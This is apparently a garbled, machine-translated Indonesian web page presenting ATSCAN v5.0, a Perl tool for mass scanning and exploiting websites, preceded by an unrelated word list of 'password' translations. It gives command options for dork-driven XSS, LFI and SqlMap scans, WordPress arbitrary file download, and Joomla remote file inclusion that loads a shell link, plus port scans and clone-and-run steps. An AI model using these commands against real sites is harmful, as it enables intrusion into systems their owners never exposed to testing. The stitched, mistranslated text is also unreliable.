German |password | Kennwort
Spanish |password | contraseña
French |password | mot de passe
Italian |password | parola d’accesso
Portuguese |password | senha
Dutch |password | Paswoord
ATSCAN V5.0 - SKRIP PERL UNTUK RENTAN SERVER, SITUS DAN SCANNER DORK.
Keterangan:
ATSCAN
mesin SEARCH
XSS scanner.
SqlMap.
LFI scanner.
Filter wordpress dan situs Joomla di server.
Cari halaman Admin.
Decode / Encode MD5 + Base64.
Libreries untuk menginstal:
ap-get install libxml-sederhana-perl
aptitude install libio-socket-ssl-perl
aptitude install libcrypt-SSLeay-perl
CATATAN: Bekerja dalam platform linux. Terbaik Jalankan pada Ubuntu 14.04, Kali Linux 2.0, Arch Linux, Fedora Linux, Centos | jika Anda menggunakan jendela Anda dapat men-download manualy.
ATSCAN-v5-0
Contoh:
pencarian sederhana:
Pencarian: -dork [dork] -tingkat [tingkat]
Cari + mendapatkan ip: -dork [dork] -tingkat [tingkat] -ip
Cari + mendapatkan ip + Server: -dork [dork] -tingkat [tingkat ] -ip-server
Pencarian dengan banyak Dorks: -dork [dork1, dork2, dork3] -tingkat [tingkat]
Cari + mendapatkan ip + Server: -dork [dorks.txt] -tingkat [tingkat]
Cari + mengatur menyimpan file: - dork [dorks.txt] -tingkat [tingkat]-save myfile.txt
Cari + Ganti + Exploit: -dork [dorks.txt] -tingkat [tingkat] -replace [string] -dengan [string] -valid [string]
Subscan dari Serach Mesin:
Cari + Eksploitasi: -dork [dork] -tingkat [10] -xss / -lfi / -wp ...
Cari + Server Eksploitasi: t [ip] -tingkat [10] -xss / -lfi / - wp ...
Cari + Ganti + exploit: -dork [dork] -tingkat [10] -replace [string] -dengan [string] -exp [mengeksploitasi] -xss / -lfi / -wp ...
Validasi:
Cari + Exploit + validasi: -dork [dork] -tingkat [10] -exp -isup / -valid [string]
Cari + Server Exploit + validasi: t [ip] -tingkat [10] -exp -isup / -valid [string]
Cari + Ganti + Exploit: -dork [dork] -tingkat [10] -replace [string] -dengan [string] -isup / -valid [string]
Gunakan Daftar / Target:
t [Target / targets.txt] -exp -isup / -valid [string]
-t [Target / targets.txt] -xss / -lfi ..
Server:
Dapatkan Server situs: t [ip] -tingkat [nilai] -sites
Dapatkan situs Server wordpress: t [ip] -tingkat [nilai] -wp
Dapatkan situs joomla Server: t [ip] -tingkat [nilai] -joom
Dapatkan Server meng-upload situs: t [ip] -tingkat [nilai] -upload
Dapatkan file situs Server zip: t [ip] -tingkat [nilai] -zip
WP Arbitry file download: t [ip] -tingkat [ nilai] -wpadf
Joomla RFI: t [ip] -tingkat [1] -joomfri -Shell [shell link]
Memindai tcp dasar (cepat): t [ip] -ports tcp -Dasar
Pindai dasar udp dasar (cepat): t [ip] -ports -Dasar udp
Pindai udp dasar + tcp: t [ip] -ports udp -Dasar + tcp
Pindai tcp lengkap: t [ip] -ports -semua tcp
Pindai udp lengkap: -t [ip ] -ports -semua udp
Pindai udp lengkap + tcp: t [ip] -ports -semua udp + tcp
Pindai berdering tcp: t [ip] -ports -Pilih tcp -Mulai [nilai] -end [nilai]
Pindai berdering udp: t [ip] -ports -Pilih udp-start [nilai] -end [nilai]
Pindai berdering udp + tcp: t [ip] -ports -Pilih udp + tcp -Mulai [nilai] -end [nilai]
Encode / Decode:
Menghasilkan MD5: MD5 [string]
encode base64: -encode64 [string]
Decode base64: -decode64 [string]
Command eksternal :
-dork [dork / dorks.txt] -tingkat [tingkat] -command "curl v
-target" -dork [dork / dorks.txt] -tingkat [tingkat] -command "curl v -FULL_TARGET"
- t [Target / targets.txt] -tingkat [tingkat] -command "curl -target v"
t [Target / targets.txt] -command "curl -FULL_TARGET v"
Cara Penggunaan:
git clone https://github.com/AlisamTechnology/ATSCAN
cd ATSCAN
perl atscan.pl
Update:
cd ATSCAN
git pull
Category
Komentar